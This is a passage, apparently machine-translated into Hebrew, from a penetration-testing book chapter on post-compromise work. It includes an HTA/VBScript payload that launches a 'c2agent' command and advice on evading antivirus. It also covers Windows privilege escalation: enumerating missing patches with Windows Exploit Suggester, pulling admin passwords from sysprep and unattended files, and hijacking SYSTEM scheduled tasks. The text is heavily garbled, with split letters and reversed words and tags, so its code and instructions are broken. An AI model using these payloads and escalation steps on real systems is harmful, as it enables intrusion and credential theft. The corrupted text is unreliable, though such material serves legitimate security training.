‫פר ק ‪ 6‬מודיעין פ לי לי לפני כמה שנים נ קראתי ל בצע תר חי ש‬

‫פנימי ש ל מוד ל ‪ APT‬ע בור שירות מ ש טרה ב ברי טניה‪ .‬זו הייתה‬
‫מ שימה מעניינת ממ ספר סי בות‪ ,‬לא כו לן ט כניות ב ל בד‪.‬‬
‫במפ קדת מ ש טרה הם לא רוצים‪ ,‬באופן כ ל לי‪ ,‬שת סתו ב ב ל בד‪,‬‬
‫אז כ ל בו קר עמיתי ואני היינו מגיעים בצייתנות לד לפ ק ה ק ב לה‬
‫כדי לפגו ש את נ קודת ה ק שר ש לנו שתפ קידה היה גם ל לוות‬
‫אותנו בר ח בי ה בניין‪ .‬נ חוץ‪ .‬ביום ה ש לי שי בי ק שנו שהג'נ ט למן‬
‫שו ביי ל ק ח הצידה ע לידי זוג שו טרים שרצו לדעת מה ענייננו‬
‫איתו‪ .‬ה ס ברתי שאנ חנויועצי א ב ט חה‪ ,‬כאן כדי להי ל חם במא ב ק‬
‫ה טו ב נגד כו חות האופ ל הנו כ חים תמיד )אנ חנו בוד קי הע טים‬
‫הם ח בורה צ בעונית( ר ק כדי שנאמר לנו שנ קודת המגע ש לנו‬
‫היא בעצם נמ ל טת מהצד ק ונעצרה בער ב ה קודם‪ .‬אף פעם‬
‫לא גי ליתי בדיו ק ע ל מה מדו בר‪ ,‬א ב ל צריך כמות מ סוימת ש ל‬
‫חוצפה כדי להגי ש מועמדות למ שרה במ ש טרה בידיעה שאתה‬
‫מ בו ק ש‪.‬‬
‫אני מז כיר את האנ קדו טה הזו לא ר ק בג ל ל האופי ה קומי ה ברור ש לה א לא בג ל ל שי ש‬

‫ל ק ח מע שי ל למוד ‪ -‬ב לי ק שר ל חו סר ה ליווי‪ ,‬עדיין הייתה לנו ע בודה לע שות ו בהת ח ש ב‬
‫בעו בדה שזה היה מ קום עמו ס עם קצינים במדים ואזר חים הו ל כים ב בניין ומ חוצה לו כ ל‬
‫הזמן ב לי שום ב קרת גי שה אמיתית )מע בר למה שהיה בעצם וו לונ טרי(‪ ,‬ה ח ל טנו פ שו ט‬
‫להמ שיך ו לה ש לים את הע בודה ש לנו‪ .‬אני מני ח שהם ח ש בו ש לאף א חד לאיהיה האומץ‬
‫לה סתו ב ב במפ קדת מ ש טרה ל לא ר שות‪ ,‬מה ש בהת ח ש ב ב כמות העצומה ש ל נתונים‬
‫ח סויים שהצ ל חנו לה שיג במה לך ה בדי קה הזו עם מע ט עצ בים ב ל בד‪ ,‬הייתה שי חה‬
‫גרועה מצידם‪ .‬ההי קף היה פתו ח כ כ ל שי כו ל להיות ) כ לומר‪ ,‬ק ב ל את מה שאתהי כו ל‬
‫בזמן הפנוי(‪ ,‬א ב ל כ ש סיימנו את הע בודה ש לנו הייתה לנו גי שה מ לאה ל‪:‬‬
‫מ סדי נתונים ש ל שי חות חירום‬
‫ח בי לותיעד מיו חדות ל סניף‬

‫מידע מפור ט ע ל מודיעים‬
‫גי שת קריאה למ סד הנתונים ה לאומי ש ל ‪DNA‬‬
‫שמות ו כתו בות ש ל בע לי כ ליירייה במ חוז‬
‫חו ק נ ש ק חם ב ברי טניה‬

‫חו ק נ ש ק חם ב ברי טניה‬
‫לארצות ה ברית ו ל ברי טניהי ש פי לו סופיות שונות בת כ לית לג בי בע לות ע ל נ ש ק‬

‫חם‪ .‬בפ ש טות‪ ,‬ק ל מאוד לה שיג רו בים בארצות ה ברית ו ק שה מאוד ב ברי טניה‬
‫) באופן חו קי ב כ ל מ קרה(‪ .‬עמית אמרי קאי ש לי ) ש חי באותה ת קופה באנג ליה( שא ל‬
‫אותייום א חד כ לא חריד אםי ש צורך ל שאת א קד חים בג לוי או שהואי כו ל לע שות‬
‫זאת סמוי‪.‬‬
‫כ שה בנתי שהוא רציני‪ ,‬ציינתי שהעונ ש המינימ לי לנ שיאת א קד ח בפומ בי הוא חמ ש‬
‫שנות מא סר ו ל כן "נ סתר" הוא כנראה המ ס לו ל ה ח כם ביותר‪.‬‬
‫א ספ קת מ טען ח ל ק ‪ VI:‬פרי סה עם ‪HTA‬‬

‫זו לא ט כני קה ש בדיו ק ת שנה את חייך‪ ,‬א ב ל דרך שימו שית במיו חד לפרו ס מ טענים‬
‫באמצעות ‪VBScript‬היא לה שתמ ש ביי שום ‪HTML.‬זהו למע שה ר ק ‪HTML‬הנו שא‬
‫ס קריפ ט בצד ה ל קו ח ש שמו שונה ל סיומת ‪ . ath.‬למה לא פ שו ט לה שתמ ש ב קו בץ‬
‫‪ HTML‬כדי לע שות את אותו הד בר?‬
‫שתי סי בות‪ .‬קודם כ ל‪VBScript ,‬י בוצע ר ק ‪ -Internet Explorer,‬ב שהוא כרגע ר ק‬
‫הדפדפן הר ביעי ה כי פופו לרי ו בירידה רצינית‪.‬‬
‫שנית‪ ,‬גם אם מ טען ‪HTML‬נפת ח ‪ -IE,‬בהמ שתמ שי ק ב ל אזהרה שהוא מ כי ל תו כן‬
‫פעי ל ש ס ביר שיי ח סם ע לידי מדיניות ניהו לית )ראה איור ‪6.1).‬‬
‫איור ‪ 6.1:‬לא ההודעה ה כי מזמינה‪.‬‬

‫ה קוד ה בא מתאים לה שגת ביצוע פ קודה ב סי סית באמצעות אינ טרא קציה פ שו טה‬
‫ש ל המ שתמ ש‪:‬‬
‫>‪<eltit><head‬מ ב חן ‪HTA</title> <HTA:APPLICATION‬‬
‫"‪APPLICATIONNAME="HTA Test‬‬
‫‪ "=LLORCS‬כן"‬
‫"ן כ"=‪SINGLEINSTANCE‬‬
‫‪"=ETATSWODNIW‬מ ק סם"‬
‫>‬
‫>‪</head‬‬
‫>"‪<script language="VBScript‬‬
‫‪Sub TestSub‬‬
‫עמום ‪objShell, objCmdExec‬‬
‫הגדר )"‪objShell = CreateObject("WScript.Shell‬‬
‫הגדר >‪getCommandOutput = objCmdExec.StdOut.ReadAll End Sub </script‬‬
‫)"‪objCmdExec = objshell.exec("c2agent‬‬
‫>‪<body> <input type="button" value="Run Script" name="run_button" onClick="TestSub"><p‬‬
‫>‪</body‬‬
‫קוד זה מוצג כפי שמוצג באיור ‪ 6.2,‬ל לא אזהרות או שגיאות כא שר נ שמר כמ סמך‬
‫‪ an.hta‬ומ בוצע‪.‬‬
‫איור ‪6.2:‬יי שום ‪ HTML‬ב סי סי‪.‬‬

‫אם המ שתמ ש לו חץ ע ל ה כפתור נ ק ב ל ביצוע פ קודה‪ .‬לא מאוד מו שך‪ ,‬נ כון? למר בה‬
‫המז ל‪ ,‬ה ב סי ס ליי שום ‪HTML‬הוא עי בוד !‪ LaTex‬לא‪ ,‬ר ק בצ חו ק‪ ,‬זה למע שה ‪ HTML‬כך‬
‫שאפ שר לגרום לאפ לי קציה להיראות‪ ,‬להרגי ש ו להתנהג בדיו ק כפי שאתה רוצה שהיא‬
‫תיראה‪ .‬לפני כן‪ ,‬אתה רוצה ל שנות את סמ ל ברירת המ חד ל למ שהו מו שךיותר‪ .‬רא שית‪,‬‬
‫הו סף את ה שורה ה באה לתג ‪HTA:APPLICATION :‬‬
‫"‪icon="#‬‬
‫לא חר מ כן עם סמ ל מותאם אי שית‪ ,‬בצע את הפעו לות ה באות מ שורת הפ קודה ש ל‬

‫‪Windows:‬‬
‫העת ק את ‪icon.ico b y +test.hta teswithicon.hta‬‬
‫ת ק ב ל מ שהו דומה לתמונה ‪6.3.‬‬
‫איור ‪6.3:‬זה קצתיותר טו ב‪ ,‬א ב ל בוא נ ב חר מ שהו שמתאים להת קפה‪.‬‬

‫זיהוי תו כנות זדוניות‬

‫שימו ש ב שפות ס קריפ טים לא מהו לי כו ל להיות דרך שימו שית להימנע מפ ל טפורמות‬
‫מת קדמותיותר לזיהוי תו כנות זדוניות‪ .‬לדוגמה‪ ,‬המוצרים ש ל ‪ FireEye‬והגנת נ קודות‬
‫ה קצה ש ל ‪Palo Alto‬יעי ליםי ח סית נגד מגוון הת קפות שמ שאירות את ‪ AV‬בא ב ק‪ .‬עם‬
‫זאת‪ ,‬הנ טייה ש להם היא להגיע לפ ס ק דין טו ב‪/‬רע ע ל קוד הפע לה שהור כ ב ו בהמ שך‬
‫ל ח סום אותו באמצעות ניתו ח התנהגותי כמו גם זיהוי "ידוע רע" בזמן אמת‪.‬‬
‫עם זאת‪ ,‬ניתן לע קוף זאת ל ח לו טין ע לידי שימו ש ב" טו בידוע" ) כ לומר‪Scripting Host) ,‬‬
‫‪-Windows‬ו ‪ PowerShell‬כדי ל בצע את המ טענים ש לנו‪ .‬כא שר הת סרי ט מעורפ ל או‪,‬‬
‫במ קרה הזה‪ ,‬אינו מעורפ ל כ ל ל‪ ,‬הוא עומד בצורהיוצאת דופן מו ל ט כנו לוגיה כזו‪ .‬זה‬
‫פ שו ט בג ל ל ש קו בצי ההפע לה שמא חורי כ לי ה ס קריפ טידועים לא זדוניים וה ס קריפ טים‬
‫עצמם נתפ סים ר ק כפרמ טרים‪ .‬אנ טי‪-‬וירו ס קונ בנציונ לי אינו מ כיר באופן מפתיע את‬
‫האמצעים הא ל טרנ טי ביים )אך ה טריוויא ליים( ה ל לו ל ביצוע פ קודה‪ ,‬כפי שמוצג באיור ‪6.4.‬‬
‫איור ‪6.4:‬הדוגמה ה ב לתי נמנעת ש ל ‪VirusTotal.‬‬

‫נו כ ל גם להת ב ס ס ע ל דוגמאות קודמות ו לה שתמ ש ‪ -VBScript‬ב ר ק כאמצעי ל ספ ק‬
‫ו להפעי ל מ טען ‪PowerShell.‬‬
‫זוהי הת קפה פ שו טה אך חז קה‪ .‬מ טרתו לנצ ל את בורות המ שתמ ש לג בי סיומות ק בצים‪.‬‬
‫זה נראה כמו דף אינ טרנ ט‪ ,‬ו ב כ ל זאתי כו ל לתת לך ביצוע פ קודות מ ב לי להציג אזהרות‬
‫למ טרה ומ ב לי להפעי ל את תו כנת האנ טי וירו ס‪.‬‬
‫ה ס למה ש ל הר שאות ‪ -Microsoft Windows‬ב‬

‫כא שר הו שג ביצוע פ קודה בת חנת ע בודה ש ליעד‪ ,‬הרא שון‬
‫כא שר הו שגה ביצוע פ קודה בת חנת ע בודה ש ליעד‪ ,‬המ טרה הרא שונה‪ ,‬באופן כ ל לי‪,‬‬
‫היא לה ס לים את ההר שאות ש ל האדם כדי ל ק ב ל את ההר שאות הג בוהות ביותר‬
‫האפ שריות באופן מ קומי‪ .‬זה מאפ שר לך לה שיג גי בו ב סי סמה‪ ,‬ל שנות את תצורת‬
‫המאר ח‪ ,‬לה שתמ ש ב ש קעים גו למיים‪ ,‬ו בדרך כ ל ל להפוך את התיי ש בות הר שת ל ח ל קה‬
‫יותר‪ .‬או לייתמז ל מז לך ותנ חת ע ל ת חנת ע בודה ש בה למ שתמ שים כ ברי ש הר שאות‬
‫ג בוהות ב ש ל תפ קידם או פ שו ט בג ל ל מדיניות א ב ט חה ל קויה‪ ,‬א ב ל אני מני ח שאתה‬
‫ת קוע בארץ המ שתמ ש וצריך הר שאות ניהו ל‪ .‬באופן כ ל לי‪ ,‬ה ס למות הר שאות עו שות‬
‫א חד מ שני ד ברים‪ :‬הן מנצ לות תו כנות פגיעות או מנצ לות תצורות פגיעות‪ .‬סעיף זה אינו‬
‫ש לם או נועד להיות‪ .‬ניתן ל ח ל ק את הד ברים ה באים ל ק טגוריות רופפות שונות‪ ,‬אך כאן‬
‫א ח ל ק את ת שומת ה ל ב באופן ה בא‪:‬‬
‫ניצו ל מ קומי ‪-‬תו כנות מ סוימות צרי כות להיות מ סוג לות לפעו ל עם הר שאות ג בוהות‬
‫כדי לתפ קד כה ל כה ו לפעמים ניתנות לתו כנהיותר הר שאות ממה שהיא צרי כה‪.‬‬
‫כך או כך‪ ,‬אם קיימות נ קודות תורפה ) בדרך כ ל ל באגים ש ל ש חיתות זי כרון(‪ ,‬אז‬
‫ניתן להערים ע ל התו כנה לתת ביצוע פ קודה ברמה שווה‪ .‬ניצו לים מ קומיים קיימים‬
‫הן ב ט כנו לוגיית ה לי בה ש ל מי קרו סופ ט הנפר סת באופן אוני בר ס לי )וזה ל לא ספ ק‬
‫אידיא לי( והן בתו כנה ש ל צדדים ש לי שיים‪.‬‬
‫שי טת הת קנה פגומה ‪ -‬כא שר תמונת ‪ Windows‬מתג לג לת‪ ,‬ב חור לא מת כוון לע בור‬
‫מת חנת ע בודה לת חנת ע בודה כדי להת קין כ ל מ כונה באופןידני; במ קום זאת‪,‬‬
‫התה ליךיהיה או טומ טי‪.‬י שנן דר כים לה שיג זאת אך הד בר ה ח שו ב הוא שהתה ליך‬
‫י כו ל לה שאיר מא חוריו ק בצי תצורה המ כי לים מידע שימו שי‪ ,‬כגון סי סמאות ) ש לרו ב‬
‫נמצאות ב ט ק ס ט רגי ל( או ‪ )Base64‬שזה טריוויא לי לפענו ח(‪.‬‬
‫מ שימות מתוזמנות ‪ -‬לפעמים א להיהיו ק בצייעד הניתנים ל שינוי שניתן לה ח ליף‬

‫ב קוד מ ש לך‪ .‬אג ב‪ ,‬אנצ ל את ההזדמנות כאן כדי לד בר ע ל הדר כים ה שונות בהן‬
‫תו כ ל לה שתמ ש במ שימות מתוזמנות כדי לה שיג התמדה‪.‬‬
‫שירותים פגיעים ‪ -‬למ שימות שירותי כו לות להיות רמות שונות ש ל א ב ט חה‪ .‬אם‬
‫ח ש בון ברמת המ שתמ שי כו ל ל שנות פרמ טרים ש ל שירות‪,‬יית כן שניתןיהיה‬
‫לה שתמ ש בו כדי לה שיג ביצוע פ קודה ברמה ג בוהה‪.‬‬
‫ח טיפת ‪DLL -‬זה כו ל ל ניצו ל ש ל א ב ט חת מער כת ק בצים ל קויה כדי לה ח ליף ספריית‬
‫קי שורים דינמיים ‪ (DLL).‬קו בצי ‪ DLL‬מ בוצעים באותו מר ח ב תה ליך )ו ל כן עם אותן‬
‫הר שאות( כמו קו בץ ההפע לה ה קורא להם‪ .‬אם קו בץ הפע לה פוע ל כ‪SYSTEM, -‬‬
‫למ ש ל‪ ,‬ואנו מ ח ליפים את ‪ -DLL‬ב ‪-DLL‬ה ש לנו‪ ,‬נו כ ל לה שיג ביצוע קוד עם הר שאות‬
‫‪SYSTEM .‬‬
‫בדי קות רי שום ‪ -‬שימו שי למציאת ק בצים בינאריים המופע לים או טומ טית באת חו ל‪,‬‬
‫שניתן גם לה ח ליף אותם‪ .‬בנו סף‪ ,‬ההגדרה ‪ AlwaysInstallElevated‬חיה ברי שום‪.‬‬
‫אם מופע ל‪ ,‬זה מאפ שר למ שתמ שים להת קין ק בצי הת קנת ‪ ism.‬כ‪ SYSTEM -‬גם‬
‫כא שר ל ח ש בונות ש להם אין ז כויות ‪SYSTEM .‬אני מ קווה שה ס כנות כאן ברורות‪.‬‬
‫לפני שתמ שיך‪ ,‬כדאי לציין ש כ כ ל שתו כ ל לתפו סיותר מידע כך המ שימה ש לך תהיה‬
‫ק להיותר‪ .‬כמו ב כ ל הנו שאים המ כו סים ב ספר זה‪,‬י שיותר בה ס למה ש ל ז כויות היתר‬
‫מא שר פ שו ט לע קו ב א חר ר שימה‪ .‬עם זאת‪ ,‬ה בנת ה ט כני קות ה באות חיונית לה בנה‬
‫טו בה ש ל הנו שא‪ .‬נ קודה מהירה נו ספת ש כדאי לה בהיר היא ש לא ניתן לת קן מ שתנה‬
‫א חד או לא ב ט ח אותו במ לואו ‪-‬אנ שים‪ .‬הת קפות לואו‪ -‬ט קי כו לות להיותיעי לות נגד‬
‫מ שתמ שי לואו‪ -‬ט ק )וא כן כא לה שצרי כים לדעת טו ביותר(‪ .‬זהי כו ל להיות פ שו ט כמו‬
‫כתי בת אפ לי קציה פ שו טה המ ח קה את תי בת ב ק שת ה סי סמה ש ל ‪Windows UAC‬‬
‫ו לראות מה הם מ ק לידים‪ ,‬כפי שמוצג באיור ‪6.5.‬‬
‫איור ‪6.5:‬תי בת דו‪ -‬שי ח ב קרת ח ש בון מ שתמ ש‪ .‬זהי כו ל להיראות איך שאתה רוצה‪.‬‬
‫הע לאת הר שאות עם ניצו ל מ קומי הד בר הרא שון שאני עו שה בדרך כ ל ל כ שאני‬
‫מנ סה לה ס לים הר שאות במער כת ‪Windows‬הוא ל בדו ק אי לו תי קונים מות קנים‪.‬‬
‫אם מאר ח מתו קן בצורה גרועה‪ ,‬אתהי כו ל לה שיג ניצ חון די מהר מ ב לי שתצ טרך‬
‫ל סרו ק את המער כת ב חיפו ש א חר תצורות גרועות‪ .‬שורת הפ קודה ה באה תפר ט‬
‫את כ ל התי קונים המות קנים‪:‬‬
C:\users\wallsopp> wmic qfe get

HotFixID, InstalledOn ,‫ תיאור‬,‫כיתו ב‬
‫יאור‬
InstalledOn
‫ת‬ ‫ב‬HotFixID
‫ה כיתו‬
http://support.microsoft.com/?kbid=3024995 KB3024995
‫עד כון‬ 2/1/2016
‫ עד כון‬http://go.microsoft.com/fwlink/?LinkId=133041
KB2849697 23/12/2014
KB2849696 23/12/2014
KB2841134 23/12/2014
http://support.microsoft.com/ KB2670838 23/12/2014
‫עד כון‬
‫ט חה‬24/12/2014
‫עד כון א ב‬
‫ט חה‬24/12/2014
‫תי קון חם‬

http://support.microsoft.com/?kbid=2416754 KB2416754 24/12/2014
‫ט חה‬24/12/2014
‫ט חה‬24/12/2014

‫עד כון‬
‫ט חה‬24/12/2014
‫ט חה‬24/12/2014
‫ט חה‬24/12/2014
‫ט חה‬24/12/2014
‫תי קון חם‬

‫ט חה‬24/12/2014
‫ט חה‬24/12/2014
‫ט חה‬24/12/2014
‫ עד כון‬http://support.microsoft.com/?kbid=2552343
KB2552343 24/12/2014 http://support.microsoft.com/?kbid=2560656
KB2560656 24/12/2014 ‫עד כון א ב ט חה‬
http://support.microsoft.com/?kbid=2564958 KB2564958 ‫ט חה‬24/12/2014
kbid=2570947 KB2570947 24/12/2014 ‫עד כון א ב ט חה‬

http://support.microsoft.com/?
<‫> חתוך ל קיצור‬
HotFixId, ‫המוצא ה ח שו ב מהפ ל ט הוא מזהה ב סי ס הידע )או‬

‫ ב‬-Windows ‫ מי שהויג לה פגיעות‬.(‫כמו שזה נ קרא כאן‬
‫ אז מי קרו סופ ט ת ש חרר תי קון ותיתן לו מזההיי חודי )ה‬.‫ּפ לַ טפ ֹו רמָ ה‬
‫המער כות מתעד כנות בהתאם ל כ ל מדיניות התי קון‬KB). ‫מ ספר‬
‫ ה‬,‫ אם לא קיים תי קון ע בור ניצו ל ספציפי‬.‫לארגון ה קצהי ש‬
‫ אם המאר ח הוא‬,‫ לדוגמה‬.‫הפ ל טפורמה פגיעה למת קפה ה ספציפית הזו‬
‫ ע שויות לאפ שר‬Windows ‫ פגיעויות ב לי בת‬- 110-11SM-‫פגיע ל‬
‫) במ קרה זה‬MS ‫ בדף האינ טרנ ט ש ל‬KB ‫ שים ל ב למ ספר‬- ‫הע לאת הר שאות‬
:‫ ו בדו ק אם התי קון המתאים מות קן‬KB2393802)
C:\Users\wallsopp>wmic qfe get
‫כיתו ב‪,‬תיאור‪| findstr /C:"KB2393802" nOdellatsnI,DIxiFtoH,‬‬
‫‪kbid=2393802 KB2393802 24/12/2014‬‬ ‫עד כון א ב ט חה‬

‫?‪http://support.microsoft.com/‬‬
‫>‪C:\Users\wallsopp‬‬
‫א לו חד שות רעות שהתי קון קיים א ב ל זה ניצו לי שן מאוד אז זהיהיה מוזר אם זה לא‬
‫היה‪ .‬ב כ ל מ קרה‪ ,‬חיפו ש באמצעות פ ל ט תי קון ‪KB‬א חד ב כ ל פעם הוא מייגע‪ ,‬גוז ל זמן‬
‫ומיותר‪ .‬עדיף ל שמור ר שימה ש ל מ ספרי ‪ KB‬והפגיעויות ה ק שורות א ליהם‪ ,‬ו ב כך לאפ שר‬
‫מאמץ מהיר ש ל ס קריפ טים כדי ל ק בוע אי לו תי קונים ח סרים‪ .‬הד בר ה כי טו ב בזה הוא‬
‫שהמ שימות ה כ בדות נע שו ב ש בי לך‪ .‬מי קרו סופ ט שומרת ע ל מ סד נתונים זמין ומעוד כן‬
‫שמ כי ל את כ ל המידע הזה וי ש כמה כ לים זמינים באופן חופ שי שמנצ לים אותו‪ .‬אני‬
‫אתאר כאן כ לי א חד כזה‪ ,‬הנ קרא באופןיצירתי ‪Windows Exploit Suggester.‬הת קן‬
‫אותו מהמאגר ועד כן אותו‪:‬‬
‫‪GDSSecurity/Windows-Exploit Suggester.git $ ./windows-exploit-suggester.py --update‬‬

‫‪$ git clone https://github.com/‬‬
‫זה מעד כן את מ סד הנתונים ש ל ‪KB‬המ קומי‪ ,‬שאם אתה ס קרן‪ ,‬נראה כמו איור ‪6.6.‬‬
‫איור ‪6.6:‬נתוני ‪-XLS‬ה מ כי לים שמות ע לונים‪ ,‬חומרה‪ ,‬ר כי ב ‪ KB‬ו‬

‫ב קרו ב‪.‬‬
‫‪Windows Exploit Suggester‬י שתמ ש בנתונים א לה כדי ל ק בוע אם למער כת שנפרצה‬

‫ח סרים תי קונים כ ל שהם‪ .‬לפני שהואי כו ל לע שות את זה‪ ,‬אנ חנו צרי כים לזרו ק כמה נתונים‬
‫מהמער כת שנפרצה‪ .‬פ קודה פ שו טה ת ספי ק עם הפ ל ט שיוע בר ל קו בץ‪:‬‬
‫‪C:\Users\wallsopp>systeminfo > comp_host1.txt‬‬
‫פ קודה זו מיועדת ל שמ ש מנה לי מער כת כדי ל בנות במהירות תמונה ש ל מאר ח לפתרון‬
‫בעיות‪ ,‬אך מדו בר בנתונים די שימו שיים גם לתו קף‪ .‬הוא מ כי ל‪ ,‬בין היתר‪ ,‬מידע מפור ט ע ל‬
‫מער כת ההפע לה‪ ,‬כו ל ל כ ל התי קונים המות קנים ו כן מידע ר שת ו חומרה‪.‬‬
‫תן את הנתונים הא לה ‪ -Windows Exploit Suggester‬ל באופן ה בא‪:‬‬
‫]*[ ‪exploit suggester.py --database 2016-06-07-mssb.xls --systeminfo comp_host1.txt‬‬

‫‪root@wil:~/Windows-Exploit-Suggester# ./windows-‬יוזם מ סד נתונים ש ל ‪ winsploit‬גר סה ]*[‬
‫…‪ 3.1‬קו בץ שזוהה ‪ -xls‬כאו ‪ xlsx‬בהת ב ס ס ע ל סיומת ]*[ בני סיון ל קרוא מ קו בץ ה ק ל ט ש ל מער כת מידע‬
‫]‪ [+‬קו בץ ק ל ט ש ל מידע מער כת נ קרא בהצ ל חה ]*[ )‪ (ascii‬קו בץ מ סד נתונים שאי לתה ע בור פגיעויות‬
‫אפ שריות ]*[ בה שוואה בין ‪245‬התי קון ה חם)ים( כנגד ‪332‬הע לונים הפו טנציא ליים עם מ סד נתונים ש ל‬
‫‪122‬ניצו ליםידועים ]*[נותרו כעת ‪ 90‬פגיעות ]‪ [+] [E] exploitdb PoC, [M‬מודו ל ]*[ ‪ Metasploit,‬ע לון‬
‫ח סר ]‪[+‬זוהתה גר סת ‪ Windows‬בתור ]*[ '‪'Windows 7 SP1 64-bit‬‬
‫‪ [E] MS15-134:‬עד כון א ב ט חה ע בור ‪ Windows Media Center‬ל טיפו ל ב ביצוע קוד מר חו ק ‪(3108669) -‬‬
‫ח שו ב ‪ [E] MS15-132:‬עד כון א ב ט חה ע בור ‪ Microsoft Windows‬ל טיפו ל ב ביצוע קוד מר חו ק ‪-‬‬
‫)‪ (3116162‬ח שו ב ‪ [M] MS15- 100:‬פגיעות ‪ -Windows Media Center‬ב ע לו לה לאפ שר ביצוע קוד‬
‫מר חו ק ‪ (3087918) -‬ח שו ב ]ה[ ‪ MS14-026:‬פגיעות ‪ -.NET Framework‬ב ע לו לה לאפ שר הע לאת‬
‫הר שאות ‪ (2958732) -‬ח שו ב ]*[נע שה‬
‫מעניין ‪-‬אר בע נ קודות תורפה עם קוד ניצו ל עו בד זמינות‪ .‬ה‪ E -‬מציין ניצו ל שנמצא בתוך‬
‫מ סד הנתונים ש ל ניצו ל ‪-Offensive Security,‬ה בעוד ה‪M -‬אומר שהת קפה זו מ שו ל בת‬
‫במ סגרת ‪Metasploit.‬‬
‫בדו ק‪ ,‬בדו ק‪ ,‬ו לא חר מ כן בדו ק עוד כמה‬

‫בדו ק‪ ,‬בדו ק‪ ,‬ו לא חר מ כן בדו ק עוד כמה‬
‫הראיתי דוגמה כיצד לה שתמ ש במנצ ל מ קומי מו קדםיותר בפר ק ‪4 ,‬אז אני לא‬
‫רוצה ל בז בז עוד עות ק לע שות זאת שו ב‪ .‬עם זאת‪ ,‬ראוי להז כיר שניתן לנצ ל פגיעויות‬
‫מ סוימות בצורה מהימנהיותר מא חרות‪ ,‬ו חיוני שהמע בדה ש לך תהיה מצוידת‬
‫בתמונות מ כונות ויר טוא ליות כדי לע בוד דרך הא ק סצנ טריות ה שונות שתמצא‪.‬‬
‫זרי קה עיוורת ש ל ניצו ל א חר ניצו ל ע ל מ כונה שנפרצה תו בי ל ר ק לת ס כו ל ו למ שימה‬
‫כו ש לת‪.‬‬
‫ניצו ל הת קנות או טומ טיות ש ל מער כת הפע לה‬

‫ה ש קות המוניות נו טות לה שאיר ק בצי תצורה מא חור‪ .‬ה ק בצים עצמםי שתנו בהתאם‬
‫לפתרון בו הארגון מ שתמ ש‪ ,‬אך הרעיון הוא זהה ‪-‬התצורותי כ ל לו נתונים הדרו שים‬
‫לתה ליך ההת קנה כגון מפת חות מוצר ו סי סמאות ניהו ליות‪.‬‬
‫לה לן דוגמה מ קו בץ ‪sysprep.inf ,‬המ כי ל אי שורי ט ק ס ט ברור‪:‬‬
‫]‪[GuiUnattended‬‬
‫‪OEMSkipRegional=1‬‬
‫‪OemSkipWelcome=1‬‬
‫‪AdminPassword=P4ssw0rd‬‬
‫אזור זמן=‪02‬‬
‫זוהי דוגמה ל קו בץ ‪unattended.xml .‬הפעם ה סי סמה מ קודדת ‪Base64,‬אותה ניתן‬

‫לפענ ח באופן טריוויא לי‪ .‬שם המ שתמ ש עדיין ב ט ק ס ט פ שו ט‪:‬‬
‫‪<Login‬או טומ טי<‬

‫> סי סמה<‬
‫>‪<Value>R0NsaWtlc3RoZWNvY2s=</Value‬‬
‫>‪ <txeTnialP‬ש קר>‪PlainText>/‬‬
‫>‪</Password‬‬
‫>‪<Enabled>true</Enabled‬‬
‫>‪<emanresU‬מנה ל>‪Username>/‬‬
‫>‪</AutoLogon‬‬
‫זה לא ממצה ב שום פנים ואופן‪ ,‬א ב ל ע ל התפ שרות ע ל מער כת חד שה‪ ,‬כדאי ל בצע‬
‫חיפו ש ש ל ‪ sysprep.inf, unattended.xml‬ו‪sysprep.xml. -‬א להי כו לים להיות‬
‫ניצ חונות מהירים מאוד‪.‬‬
‫ניצו ל מתזמן המ שימות‬

‫ניצו ל מתזמן המ שימות‬

‫מתזמן המ שימות ‪ -Windows‬ב שווה פ חות אויותר ל‪ norC-‬בדומה ‪ -UNIX‬ל‬
‫מער כות הפע לה ‪-‬ניתן להגדיר מ שימה ) בדרך כ ל ל ביצוע ש ל תו כנית(‪.‬‬
‫לרוץ בזמן מ סוים או במרוו ח מוגדר‪ .‬אם התו כנית נ קראת ע לידי מתזמן המ שימות‬
‫מופע ל עם הר שאות ג בוהות וניתן לדרו ס אותו ע לידי ח ש בון המ שתמ ש שאתה‬
‫י ש לך כרגע‪ ,‬אז אתהי כו ל פ שו ט לה ח ליף את התו כנית הזו ב בינארי ו‬
‫לה שיג ביצוע קוד בפעם ה באה שהמ שימה מתו כננת לפעו ל ) ב ש ל ב זה‬
‫ע ליך להעתי ק את התו כנית המ קורית חזרה למי קומה המ קורי(‪.‬‬
‫אתהי כו ל ל ק ב ל ר שימה ש ל מ שימות מתוזמנות עם הפ קודה ה באה‪:‬‬
‫שאי לתת ‪ schtasks‬ע בור ‪LIST /v‬‬

‫זה נותן פ ל ט ר ב לג בי המ שימות שפוע לות‪ ,‬בין אם כן‬
‫חוזר‪ ,‬הי כן ניתן למצוא את המ שימה ואת הפרמ טרים ש לה‪ ,‬כמו גם‪ ,‬באופן מ כריע‪,‬‬
‫עם אי לו הר שאות הם מופע לים‪ .‬לדוגמה‪ ,‬המ שימה ה באה פוע לת כ‬
‫מער כת‪ .‬אם נו כ ל לה ח ליף את ה בינארי הר לוונ טי ב קוד מ ש לנו‪ ,‬נו כ ל‬
‫לה שיג ביצוע פ קודה עם הר שאות ‪SYSTEM :‬‬
‫שם מאר ח‪:‬‬ ‫‪WALLSOPP‬‬
‫‪\HEARTB‬זמן ריצה ה בא‪ :‬ס ט טו ס‪ :‬מצ ב כני סה‪ :‬זמן ריצה א חרון‪ :‬תוצאה א חרונה‪ :‬מ ח בר‪:‬‬
‫שם מ שימה‪:‬‬
‫‪DanTek‬‬ ‫‪Systems‬‬
‫‪10-6-2016‬‬ ‫‪Corp.‬‬
‫‪10:52:49‬‬
‫מ ו ּ כָן‬
‫אינ טרא ק טי בי‪/‬ר קע‬
‫לא‬
‫‪1‬‬
‫מ שימה להפע לה‪C:\Program Files\DanTek :‬‬

‫‪ Systems Corp\HeartBeat\HEARTB.exe -‬לו ח זמנים‬
‫הת ח ל ב‪C:\Program Files\DanTek :‬‬
‫\‪Systems Corp\HeartBeat‬‬
‫בה‪:‬‬
‫תגו בר‬
‫יאות תה לי כים‬ ‫ני טור‬
‫‪HEARTB‬‬
‫מופע לק‪ :‬ניהו ל צרי כת ח שמ ל‪:‬‬
‫מצ ב מ שימה מתוזמנת‪ :‬זמן סר‬
‫נ כֶה‬
‫ָ‬
‫אם לא מתוזמנת מ חד ש‪ :‬עצור מ שימה אם פוע ל ‪ X‬שעות ו‪ X-‬ד קות‪:‬‬

‫מער כת‬
‫הפע ל כמ שתמ ש‪ :‬מ ח ק מ שימה‬
‫מופע ל‬ ‫‪02:00:00‬‬
‫בפורמ ט זה‪.‬‬
‫זמוןן לא‬
‫תזמי‬
‫ים‪:‬‬
‫זמנ‬
‫י‬ ‫לו ח‬
‫נתונ‬
